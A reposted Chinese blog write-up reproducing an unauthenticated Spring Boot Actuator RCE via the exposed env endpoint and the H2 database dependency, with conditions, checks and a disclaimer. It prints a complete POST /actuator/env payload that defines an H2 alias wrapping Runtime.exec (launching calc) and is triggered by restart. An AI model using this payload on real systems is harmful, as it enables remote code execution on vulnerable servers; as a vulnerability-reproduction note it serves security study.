碼上快樂

相關內容    簡體    繁體

Spring未授權REC利用方式四(env接口/h2 database query RCE)

本文轉載自   查看原文   2021-01-29 15:46   359    漏洞復現

一、漏洞成因

  env接口暴露

  使用h2 database 依賴

二、利用條件

  env接口

  restart接口

  存在 com.h2database.h2 依賴

三、漏洞確認

  訪問env接口,查看是否存在h2 database相關依賴

  

 

 四、漏洞復現

  1. 訪問env接口post傳參,記得添加content-type

POST /actuator/env
Content-Type: application/json

{"name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS T5 AS CONCAT('void ex(String m1,String m2,String m3)throws Exception{Runti','me.getRun','time().exe','c(new String[]{m1,m2,m3});}');CALL T5('cmd','/c','calc');"}

  

 

   2.我這里改成了畫畫板,訪問env查看是否寫入

  

 

  3.restart重啟

  

 

   總結:

   1.這個利用過程比較簡單,就是在發送post請求的時候,里面value值的在執行一次后換一個T5,如下換T6,原參考文章中有提到,否則執行失敗。

   2.h2 database還有Jndi注入的注入方式就不嘗試復現了

   3.mysql的有點復雜,暫時不嘗試了,spring未授權的rec漏洞復現暫時到此為止了。

 

參考文章:

  https://github.com/LandGrey/SpringBootVulExploit#0x04jolokia-logback-jndi-rce


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 Spring未授權REC利用方式一(env接口/snakeyaml RCE) Spring未授權REC利用方式二(env接口/eureka xstream RCE) Spring未授權REC利用方式三(jolokia接口/jolokia Realm JNDI RCE) Spring Boot Actuator H2 RCE復現 H2 database的使用 H2 Database入門 MobileIronMDM 未授權RCE Spring Boot + Mybatis + H2 database數據庫 redis未授權漏洞和主從復制rce漏洞利用 spark未授權RCE漏洞
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM